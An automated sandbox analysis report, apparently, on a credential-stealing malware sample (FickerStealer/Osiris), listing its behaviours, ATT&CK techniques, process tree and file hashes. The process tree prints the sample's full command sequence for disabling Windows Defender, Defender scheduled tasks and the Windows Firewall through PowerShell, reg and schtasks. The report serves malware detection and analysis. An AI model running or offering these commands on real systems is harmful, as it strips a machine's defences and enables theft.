osiris | 90929f4e6bd28d6a197fef323930502ac1a3dcc9de8d4dba02dc6702fd570e14

Analysis

max time kernel
134s
max time network
137s
platform
windows10_x64
resource
win10v20201028
submitted
28-01-2021 10:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FickerStealer.exe
Size

307KB
MD5

1c213dbc2e5f8646d4c30586b7bcb3d8
SHA1

7a7c24e9bde5666de8763232d9ffa012fe9d18cd
SHA256

90929f4e6bd28d6a197fef323930502ac1a3dcc9de8d4dba02dc6702fd570e14
SHA512

e4b5bf282c771e1ce7152fabd5a44ecd094d5a6b0a61c26d0e25f9df15b55a6efaeaeca6a4f52a84d8d5859b6d3d2e8f15280f619edbc7c5ac4321d2359067da

Score

10^/10

osiris banker botnet discovery evasion ransomware spyware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\2BD8.tmp\2BD9.tmp\2BDA.bat	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Osiris
banker botnet osiris
Executes dropped EXE 4 IoCs

Processes:

1611831107723.exe1611831107750.exe1611831107750.exeGetX64BTIT.exe

pid process

3948 1611831107723.exe
2224 1611831107750.exe
1248 1611831107750.exe
384 GetX64BTIT.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

pid	process
3948	1611831107723.exe
2224	1611831107750.exe
1248	1611831107750.exe
384	GetX64BTIT.exe

Drops startup file 2 IoCs

Processes:

DllHost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe	DllHost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

JavaScript code in executable 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe	js
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe	js
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe	js

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 api.ipify.org
23 api.ipify.org
24 api.ipify.org
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Suspicious use of SetThreadContext 1 IoCs

Processes:

FickerStealer.exe

description pid process target process

PID 3992 set thread context of 1928 3992 FickerStealer.exe FickerStealer.exe

flow	ioc
8	api.ipify.org
23	api.ipify.org
24	api.ipify.org

description	pid	process	target process
PID 3992 set thread context of 1928	3992	FickerStealer.exe	FickerStealer.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FickerStealer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	FickerStealer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FickerStealer.exe

Suspicious behavior: EnumeratesProcesses 7936 IoCs

Processes:

FickerStealer.exe1611831107750.exepowershell.exe1611831107750.exepowershell.exe

pid	process
1928	FickerStealer.exe
1928	FickerStealer.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
2224	1611831107750.exe
908	powershell.exe
908	powershell.exe
2224	1611831107750.exe
2224	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
1248	1611831107750.exe
908	powershell.exe
1448	powershell.exe

Suspicious use of AdjustPrivilegeToken 334 IoCs

Processes:

1611831107750.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeSecurityPrivilege	2224	1611831107750.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeIncreaseQuotaPrivilege	908	powershell.exe
Token: SeSecurityPrivilege	908	powershell.exe
Token: SeTakeOwnershipPrivilege	908	powershell.exe
Token: SeLoadDriverPrivilege	908	powershell.exe
Token: SeSystemProfilePrivilege	908	powershell.exe
Token: SeSystemtimePrivilege	908	powershell.exe
Token: SeProfSingleProcessPrivilege	908	powershell.exe
Token: SeIncBasePriorityPrivilege	908	powershell.exe
Token: SeCreatePagefilePrivilege	908	powershell.exe
Token: SeBackupPrivilege	908	powershell.exe
Token: SeRestorePrivilege	908	powershell.exe
Token: SeShutdownPrivilege	908	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeSystemEnvironmentPrivilege	908	powershell.exe
Token: SeRemoteShutdownPrivilege	908	powershell.exe
Token: SeUndockPrivilege	908	powershell.exe
Token: SeManageVolumePrivilege	908	powershell.exe
Token: 33	908	powershell.exe
Token: 34	908	powershell.exe
Token: 35	908	powershell.exe
Token: 36	908	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeIncreaseQuotaPrivilege	1448	powershell.exe
Token: SeSecurityPrivilege	1448	powershell.exe
Token: SeTakeOwnershipPrivilege	1448	powershell.exe
Token: SeLoadDriverPrivilege	1448	powershell.exe
Token: SeSystemProfilePrivilege	1448	powershell.exe
Token: SeSystemtimePrivilege	1448	powershell.exe
Token: SeProfSingleProcessPrivilege	1448	powershell.exe
Token: SeIncBasePriorityPrivilege	1448	powershell.exe
Token: SeCreatePagefilePrivilege	1448	powershell.exe
Token: SeBackupPrivilege	1448	powershell.exe
Token: SeRestorePrivilege	1448	powershell.exe
Token: SeShutdownPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeSystemEnvironmentPrivilege	1448	powershell.exe
Token: SeRemoteShutdownPrivilege	1448	powershell.exe
Token: SeUndockPrivilege	1448	powershell.exe
Token: SeManageVolumePrivilege	1448	powershell.exe
Token: 33	1448	powershell.exe
Token: 34	1448	powershell.exe
Token: 35	1448	powershell.exe
Token: 36	1448	powershell.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeIncreaseQuotaPrivilege	3028	powershell.exe
Token: SeSecurityPrivilege	3028	powershell.exe
Token: SeTakeOwnershipPrivilege	3028	powershell.exe
Token: SeLoadDriverPrivilege	3028	powershell.exe
Token: SeSystemProfilePrivilege	3028	powershell.exe
Token: SeSystemtimePrivilege	3028	powershell.exe
Token: SeProfSingleProcessPrivilege	3028	powershell.exe
Token: SeIncBasePriorityPrivilege	3028	powershell.exe
Token: SeCreatePagefilePrivilege	3028	powershell.exe
Token: SeBackupPrivilege	3028	powershell.exe
Token: SeRestorePrivilege	3028	powershell.exe
Token: SeShutdownPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeSystemEnvironmentPrivilege	3028	powershell.exe
Token: SeRemoteShutdownPrivilege	3028	powershell.exe
Token: SeUndockPrivilege	3028	powershell.exe
Token: SeManageVolumePrivilege	3028	powershell.exe
Token: 33	3028	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1611831107750.exe

pid process

1248 1611831107750.exe

pid	process
1248	1611831107750.exe

Suspicious use of WriteProcessMemory 139 IoCs

Processes:

FickerStealer.exeFickerStealer.exe1611831107723.execmd.exe1611831107750.exe1611831107750.exe

description	pid	process	target process
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 3992 wrote to memory of 1928	3992	FickerStealer.exe	FickerStealer.exe
PID 1928 wrote to memory of 3948	1928	FickerStealer.exe	1611831107723.exe
PID 1928 wrote to memory of 3948	1928	FickerStealer.exe	1611831107723.exe
PID 1928 wrote to memory of 3948	1928	FickerStealer.exe	1611831107723.exe
PID 1928 wrote to memory of 2224	1928	FickerStealer.exe	1611831107750.exe
PID 1928 wrote to memory of 2224	1928	FickerStealer.exe	1611831107750.exe
PID 1928 wrote to memory of 2224	1928	FickerStealer.exe	1611831107750.exe
PID 3948 wrote to memory of 3920	3948	1611831107723.exe	cmd.exe
PID 3948 wrote to memory of 3920	3948	1611831107723.exe	cmd.exe
PID 3920 wrote to memory of 748	3920	cmd.exe	MpCmdRun.exe
PID 3920 wrote to memory of 748	3920	cmd.exe	MpCmdRun.exe
PID 3920 wrote to memory of 908	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 908	3920	cmd.exe	powershell.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 2224 wrote to memory of 1248	2224	1611831107750.exe	1611831107750.exe
PID 1248 wrote to memory of 384	1248	1611831107750.exe	GetX64BTIT.exe
PID 1248 wrote to memory of 384	1248	1611831107750.exe	GetX64BTIT.exe
PID 3920 wrote to memory of 1448	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 1448	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3028	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3028	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 4032	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 4032	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3476	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3476	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 2688	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 2688	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3508	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3508	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 904	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 904	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3476	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3476	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3540	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3540	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 1000	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 1000	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 384	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 384	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3804	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3804	3920	cmd.exe	powershell.exe
PID 3920 wrote to memory of 3544	3920	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3992

C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
2⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1928

C:\Users\Admin\AppData\Local\Temp\1611831107723.exe
"C:\Users\Admin\AppData\Local\Temp\1611831107723.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3948

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BD8.tmp\2BD9.tmp\2BDA.bat C:\Users\Admin\AppData\Local\Temp\1611831107723.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3920

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
5⤵
PID:748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
5⤵
PID:4032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
5⤵
PID:3476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
5⤵
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
5⤵
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
5⤵
PID:904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
5⤵
PID:3476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
5⤵
PID:3540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
5⤵
PID:1000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
5⤵
PID:384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
5⤵
PID:3804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
5⤵
PID:3544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
5⤵
PID:3028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
5⤵
PID:1568

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
6⤵
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
5⤵
PID:2336

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
6⤵
PID:2208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
5⤵
PID:2696

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
6⤵
PID:2504

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5⤵
PID:1912

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
5⤵
PID:3508

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
5⤵
PID:3492

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
5⤵
PID:3936

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:1000

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
5⤵
PID:3544

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5⤵
PID:2188

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:2128

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
5⤵
PID:1632

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:1636

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5⤵
PID:860

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
5⤵
PID:2788

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
5⤵
PID:2504

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:3028

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:2312

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
5⤵
PID:1332

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5⤵
PID:1568

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
5⤵
PID:4064

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
5⤵
PID:3684

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
5⤵
PID:4044

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
5⤵
PID:4032

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
5⤵
PID:3544

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:2188

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:2128

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:1632

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1636

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:860

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2788

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2504

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2316

C:\Users\Admin\AppData\Local\Temp\1611831107750.exe
"C:\Users\Admin\AppData\Local\Temp\1611831107750.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2224

C:\Users\Admin\AppData\Local\Temp\1611831107750.exe
"C:\Users\Admin\AppData\Local\Temp\1611831107750.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1248

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:384

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
- Drops startup file
PID:1824

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Connection Proxy

T1090

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Connection Proxy

T1090

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
31f4e84575473ad789007c408669c384

SHA1
460830c4d1f71c1c3deed79a76682aed80041a7e

SHA256
e449e2bca9275764bab397409803a443fd2ab3e4ebc2a25d4ccc89411e49cea1

SHA512
8e84de2bfc0f9f4e06dd1aa7600a781cfadc9a38f7e79ddd60e2beeb2ac57f7c65c42c90bc0bd6df3002734819b26d8dbf2132ff2820835ee592eb8c3ee825f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9cf55d19864a6c464aa5fa55b3a8c520

SHA1
afeeaefbfba4883c16919788f1fb198d6d713d89

SHA256
e5f803370e626eb7b29eba39e37a20a4fea57e28854fc389e192348073bf75c0

SHA512
c9d95cc8355eae311ca4b878d0ffd119a64fcbe52bb10f9ca541214ab0ba7f61f43be39ee9017a50c1130a8874736fd6a9968f7c0b19dce1f585e105ca9f4742

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2596ee54c5e2b45f37498beb74fad48c

SHA1
0e04f07001aad51b5dcf7ee92cf71368c1f97acd

SHA256
1f91e194998add1a178fa0047aad1f884c977fa967653f89e7c27b73ec307bec

SHA512
283bb9dc416e8f3a631382427c97fbd5dbea8fbf7b92f9a3579586c1cc81b6a5ab24a24bd786c2dce04cf52f8288d6ccc4205c4ad31010cf94a9d3cd59b9680e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
20a1497e91ab188e0d9acf2401694eea

SHA1
fef8f1404b9e89ac13a3f44d13f0e5db69005da8

SHA256
a7ab4956a3cb961a212b7426007fd73c57c59c2073118165de56ef7a8916e6d9

SHA512
07a013c27b7a18f43af918e26b952f3cf90414dee88a56b4e1686bc734800a8348f692ed599d0c24a212f6e5a79a90830bc97ff06e5dc111f033d44cbe6f9114

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
84948fb5aca4043c08405ca691b1c9e5

SHA1
878c2a7c36229d3c1beaa8493619ac7607b910de

SHA256
6bfb287820f5ddd74d5a57da0765cc27d99b8e9244eb0245d42724f732aa7dca

SHA512
292fae4d6dc64f94b9063bf83fa3ad15c7700ff61aea16bb8a90d25fd0b6cade5d4f02687af8604cee8af114587f12cec208d0c77882c4277f2b7d441790758c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0a553b1262b1345f0ac118fd5e38eccf

SHA1
a1e83b6766ed2b297a0fc49fd03fcca73152dc39

SHA256
8cab4a8b3363a7707c5d4d4f33d697d05e780a026d08c0baead2723ebcff67e2

SHA512
a062708b6e3717e8e7be9f905b3fcdcee8976fd33c9519ca6e4a9f3b65cf7dcc97f893afd3f9a2653f051d113609a6c5b2e08c4f929a38fe5e9dc9cef09994a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
82949717bfb2e273fb13a25bbc38fc9d

SHA1
5e3d011603ff6b04e07b4314a7b6a823d9025339

SHA256
0a9f267769ad0dd00327503906c2ebef5fcc2abb707a3d7dda75fa4fc4c4e233

SHA512
53a14c425d53192f065e6f1dca7fd6da48e1cec8fb7756df2e94a2cfedd710587c0e43bc63631a1674bc6da53aa315a1bdc9400e189f7a0abb3c54b4751dce94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
cda107db6d56739ce6cb87da0e9456ed

SHA1
27abe9f4c17837fd007851e5d8afe1b27655c578

SHA256
3afc6b71b145f32c8c272b3267095dfd50e4c1ce054446b1906d13f1a6ee93e7

SHA512
06dca2bcc1892670e3edef115833e719dd9959c684a97862cd4eeecd6a7d7ae7aeb7381c3be7762345c28aaf5b948df3252f1ac739c6b662ab501dd2fd2343fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1fb554d897b83939344d4c5e6ce9fe81

SHA1
39e09f48220332011ce1aa12825da5a0e08d2c85

SHA256
e55f5944cd965087b0aaa0b950b72d4eac8f7a5756c7c454ce1f190aa3928643

SHA512
